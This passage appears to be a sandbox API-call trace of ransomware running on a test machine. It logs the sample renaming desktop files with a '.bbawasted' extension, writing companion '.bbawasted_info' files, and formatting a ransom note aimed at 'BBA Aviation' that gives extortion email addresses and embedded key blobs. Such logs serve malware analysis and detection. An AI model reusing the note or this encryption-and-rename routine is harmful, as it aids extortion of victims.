KEY:\r\n[begin_key]FJnlEIQJOX9ioO5p4FboMtoA+fuiCHr/Enfj1zkyrlDtob5e7uM8nXwrGwAOM/QH\r\nJuA02m2pAyLDXnltjt6QmHLf/h6xgK7oP7MbpGzpyKdd3l5E8cO+LIMO58YV/aG0\r\nn9ys4Sf4JTxRfSFfmysp2lTK5VDt9TkiNn44bBVFBgRgeftgKa69W5vfJjlTHbYB\r\ncFVpmqiq5kXoEi/9Kd8+TXxpIdMI2A2qzp71nMapLMRn2r2CFqTR87KTUnQxqxRz\r\nETFC0oZ+rXW4NmNGWOfDlx5z00Qz2qTXMbcrBTfepwswb5UEtFwmcSyGWP2a1opS\r\nyw7a5teMeUwNtTnOjxe3vCDYliG0Opmc5aj6bVsj50qRmkR45YClTizHQfTX/gGJ\r\nuLYLwFxb5RsZMSCdBBWErrIN1XoUgaDwFp3nZJmf4sZOw5CLwIIMQaTQtuahtp5A\r\nAsz1yvxZKW/72zILuIs26z7t/fTGH37CsVfzIj/zNWwJtrkmWOUdIqc/vJM8dl1l\r\noUjfvc6oserpdGAhTspf5OLAt/r8MtW3Dy6H9zxKf5j1ww5QrEtvsTV00ZowK5pu\r\neKpZcO3MgCakD0+9ZiL8yyJkz6M4H/0oqIStPllHLiPnZ9NklUY8Zcp7fRqqiypX\r\nT/L5io7TSFKhPNkf6AfZRMiByS2sX6Ebhudqo8HKNBf=[end_key]\r\nKEEP IT\r\n") returned 984 [0203.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0203.198] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0203.198] SetEndOfFile (hFile=0x280) returned 1 [0203.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0203.201] CloseHandle (hObject=0x280) returned 1 [0203.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0203.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac7b8 | out: hHeap=0x660000) returned 1 [0203.204] _aulldvrm () returned 0x0 [0203.204] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0203.205] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0203.205] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0203.205] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\2-xf4UsB.mkv") returned 40 [0203.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6c4b88 [0203.206] lstrcpyW (in: lpString1=0x6c4bd8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0203.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0203.206] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0203.206] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0203.206] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0203.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\2-xf4UsB.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\2-xf4usb.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0203.300] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0203.301] SetEndOfFile (hFile=0x280) returned 1 [0203.301] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0203.301] lstrcpyW (in: lpString1=0x6c4bd8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0203.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\2-xf4UsB.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\2-xf4usb.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\2-xf4UsB.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\2-xf4usb.mkv.bbawasted")) returned 1 [0203.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\2-xf4UsB.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\2-xf4usb.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0203.303] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0203.303] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xa37d [0203.303] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa37d) returned 0x640000 [0203.304] CloseHandle (hObject=0x27c) returned 1 [0203.309] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0203.310] CloseHandle (hObject=0x290) returned 1 [0203.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0203.310] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0203.310] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0203.310] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0203.311] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0203.311] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0203.311] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0203.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0203.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0203.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0203.323] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GRYuqC4ZLme7Q3HDotseEWGsz+nmesnkaaCsMp4rupBCvNHXtkYNtwxH8dSaQ4TC\r\nPyD1aKEsnWZ8FGltWTB0dte8iAK7ObhQW9+2r7vwWhcTVgLNhRHqsaG1biLiqC5q\r\nshOLSFoS9v4MQiPY+tjkRbZJKlSUJiygupM2SogS09SFJhbm2M4MDDdNJJi5dUii\r\n8QVYFG/LmLqtcpaZi/SuE/9/09dC83MHTptPDXF/ptyLUY93aSzcQZ8KKptTyHZv\r\nNfYo18IZxK4n+CYEE+OPhjbORLtcXzzBBwf5I/wrg80XSJWyNISErFYYigzFMrv4\r\nDQkNhimo0AGSPsmq6X3La2E0zJkBlEX3lOS3Qcld3aknh4Xr+2/aUlCyZ2etw2fQ\r\n6qSm707S0ajTGg4yNfsEzb1bZAWgrvO2pgk0JkPUqEjhfOzLO+kDyYpdbhbbGdaT\r\nSoMBsLb/NNkDKVuZ7KdtTIMPjwj1RdrM+TWftT0pXuoETvWmYpj3o3/UJvOmB5xl\r\nvqRoaQoo00L1GWNSd0PXOoZrI8xS/Bc9Loh1RU+Mj0FBx6grZrWXnrnmDEIxZ77+\r\nzByfxIAG3YAi5ol5YVxSq6ZfhaqGSEoQ9r8CUn3C+ERz/HHsL9aVP7VnBPNfKVOw\r\nvaY68PH7Rcx24YDFyLVvXBGG9GGQ4z8vtHCExmS4dJW=[end_key]\r\nKEEP IT\r\n") returned 984 [0203.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0203.323] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0203.324] SetEndOfFile (hFile=0x280) returned 1 [0203.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0203.327] CloseHandle (hObject=0x280) returned 1 [0203.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0203.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3fe8 | out: hHeap=0x660000) returned 1 [0203.332] _aulldvrm () returned 0x0 [0203.332] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0203.333] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0203.333] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0203.333] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3GMvM-XW.odp") returned 40 [0203.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6c4b88 [0203.334] lstrcpyW (in: lpString1=0x6c4bd8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0203.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0203.334] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0203.334] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0203.334] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0203.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3GMvM-XW.odp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\3gmvm-xw.odp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0203.335] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0203.459] SetEndOfFile (hFile=0x280) returned 1 [0203.730] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.730] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0203.730] lstrcpyW (in: lpString1=0x6c4bd8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0203.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3GMvM-XW.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\3gmvm-xw.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3GMvM-XW.odp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\3gmvm-xw.odp.bbawasted")) returned 1 [0204.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3GMvM-XW.odp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\3gmvm-xw.odp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0204.038] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0204.038] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1662c [0204.038] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1662c) returned 0x640000 [0204.038] CloseHandle (hObject=0x27c) returned 1 [0204.050] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0204.051] CloseHandle (hObject=0x288) returned 1 [0204.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.052] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0204.052] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.053] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0204.053] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0204.053] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0204.053] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0204.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0204.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0204.065] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tzFWnU5U5InFKmS4UPIpkPMd1ne1Msjfw+g69I3qzTnObCovZEYdRTkmS1f7HCFV\r\nnBjxyJCf9HzEVHhWPNpjTV3ekjkSHd9tL8CziFlSBJ6V19JRRA7laxOhZeSCTdDE\r\n5JQq5/MDkD8nE2qR3yeSu1phTEP1pkr3eqzQbYVeokwxVRMSNj1JyyPeHl3bXHiH\r\nrT8jmz8cN4Hn6xIc2gFteeGNfEGLTWi+qKWdajraVzEAHxa1+xl3AkdjEJIF4fQz\r\n1X13F9+yeIWasHvMFrLqorZJw1NYf1IAkGLGTBWukf82sndAOpDJdOGsUqJWcY5T\r\nFmWTbqmCwDVCHQxjciNuBkAr0IWCUtEOr75rqUZjatGrQrEBl4NnjEeE0ES/wPv/\r\nFSXxrURrdWQAPJ1gNVAs7o6hDNXQwo5v3upEqMJKg7YCu/YYtvkycXDaE/UUTZId\r\nrC4uVSz0OMFrJaz0lE/t0F3uC0O+oVYFgvads9n7mXOvIQ/RyeO8SUpEQFfjasZK\r\nccOGRmKWltfRUIs+mihJkRX3kZgox+opUaauo2ome30nnv/zGVNB15qMxrtP0TwP\r\narlYieYvCdpupBhpf1/nixqlF0aEQeesbnk+W+mLmvDtpzcDXbMrZ/gMJJLwvIZ7\r\n9CbMwhB78l/imalooHjHe7Vlx6CnztU9SXTNhkZ4Vk5=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0204.065] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0204.066] SetEndOfFile (hFile=0x280) returned 1 [0204.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0204.174] CloseHandle (hObject=0x280) returned 1 [0204.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0204.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4408 | out: hHeap=0x660000) returned 1 [0204.176] _aulldvrm () returned 0x0 [0204.176] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0204.177] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0204.177] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0204.177] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5YB3PmkbOzi6DyRf8hg8.bmp") returned 52 [0204.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0204.177] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0204.177] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0204.178] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0204.178] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0204.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5YB3PmkbOzi6DyRf8hg8.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\5yb3pmkbozi6dyrf8hg8.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0204.180] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.181] SetEndOfFile (hFile=0x280) returned 1 [0204.182] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0204.182] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5YB3PmkbOzi6DyRf8hg8.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\5yb3pmkbozi6dyrf8hg8.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5YB3PmkbOzi6DyRf8hg8.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\5yb3pmkbozi6dyrf8hg8.bmp.bbawasted")) returned 1 [0204.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5YB3PmkbOzi6DyRf8hg8.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\5yb3pmkbozi6dyrf8hg8.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0204.183] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0204.183] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1476 [0204.183] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1476) returned 0x640000 [0204.183] CloseHandle (hObject=0x288) returned 1 [0204.201] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0204.201] CloseHandle (hObject=0x27c) returned 1 [0204.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.201] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0204.202] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.202] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0204.202] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0204.202] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0204.202] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0204.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0204.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.380] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]PIVq/A7GDfMoAYtROpU6S6Jrbq8okQP4jiYRxxyYmodbj3mZfqljaYoRJd/PrCUm\r\nzB2him1zj/JYfKu0an2vRq1gb6Qd3b3DCJB1AulDbZKPNgSNR/UtdJ77T9bLUtMN\r\nMpQh6DTrRX6CZ7OmY71WCw5AtNHYDvIC5WaeD0MVrBJaZQiZpvWZgHrzfTo42CXH\r\nUrIzrURIeIZqEcV2z5GqhMreO3nrTh4XQKh3NNsx2QLbOrNDhWBcLNH3fO2/WbIw\r\nn9slsgQDAZZwUCrfThmRby0VD/4qGc5kWsan8Ttq7Sd/8wDOXUnpYo+Pk2KRjrn+\r\niitFmXDSxzDBdwS0FfoJAtRYiaIqCHje/zeGSAd2SKfg+jApUHIoCywqInVoKgmI\r\nmSqxEIaytSGv5M+sFnPImhsitu71vqhFUKtV/Vk7LzBH6WA8E38Te2IzscNhUBjm\r\nweiknnfK4Ci5pc6w8JHpI2tbyUG2UXG/V5TkvEwH9e4zw7SDiv3+XoJsVSnd6vdY\r\n4JJEpWEu9oqYXR994stxjiwCd/cuVzHtP/CMgSaCywQAsdYPqRfIXE6ySp0N+lI+\r\nDHX9ziQH+qUQMNmoJ+vPGQI6hoZUo67RCzzxWdZEsrsrsLHXAgtRVsQ/GFhX2yVN\r\npVPebb0k6BtBXpG0dyhwmCe6a1vHR5xYWnhqHuQuMgM=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0204.380] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0204.381] SetEndOfFile (hFile=0x280) returned 1 [0204.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.383] CloseHandle (hObject=0x280) returned 1 [0204.392] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0204.392] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adc10 | out: hHeap=0x660000) returned 1 [0204.392] _aulldvrm () returned 0x0 [0204.392] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0204.393] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0204.393] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0204.393] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\892r7Wt7HyBxi0b.png") returned 47 [0204.393] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 